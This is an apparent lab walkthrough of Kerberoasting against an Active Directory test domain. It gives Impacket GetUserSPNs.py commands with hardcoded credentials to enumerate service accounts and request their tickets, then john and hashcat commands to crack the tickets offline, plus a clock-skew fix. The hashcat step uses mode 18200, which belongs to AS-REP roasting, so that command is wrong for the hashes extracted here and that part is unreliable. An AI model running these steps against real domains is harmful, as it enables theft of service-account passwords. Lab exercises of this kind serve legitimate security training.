Kerberoasting targets service accounts with an assigned SPN. When a user requests access to a service, they receive a Service Ticket (ST) encrypted with the service account’s long-term password.
If an attacker can obtain the ST, they can attempt to crack the encryption offline to retrieve the service account password.
Kerberos Ticket Exchange for Services
3) TGS-REQ (Client -> KDC/TGS)
- TGT 🔑 Encrypted with KDC key
- Authenticator Data 🔑 Encrypted with TGS Session Key
4) TGS-REP (KDC/TGS -> Client)
- ST 🔑 Encrypted with Service key
- Service Session Key 🔑 Encrypted with TGS Session Key
Unlike AS-REP Roasting, Kerberoasting requires valid domain user credentials to request a service ticket.
#On attacker machine create a dedicated python environment (optional)
python3 -m venv venv
. venv/bin/activate
pip3 install impacket
#Check kerberoastable users using the Impacket's module: GetUserSPNs.py
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc
in this case there're two vulnerable users: 'kerberoasting' and 'angel'.
Step 5: Request Service Tickets for Kerberoasting
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request #without specifing a user it checks all possible tickets
GetUserSPNs.py dev-angelist.lab/devan:'Password123!' -dc-ip corp-dc -request-user kerberoasting | grep '\$krb5tgs\$' > kerberoast.txt
Step 6: Crack the Service Ticket
john --wordlist=/home/kali/Documents/password.txt ./kerberoast.txt
hashcat -m 18200 ./kerberoast.txt /home/kali/Documents/password.txt
Troubleshooting: Clock Skew Errors
If you encounter KRB_AP_ERR_SKEW (Clock skew too great), synchronize the clocks with:
sudo timedatectl set-ntp off
ntpdate -q corp-dc
ntpdate -u corp-dc
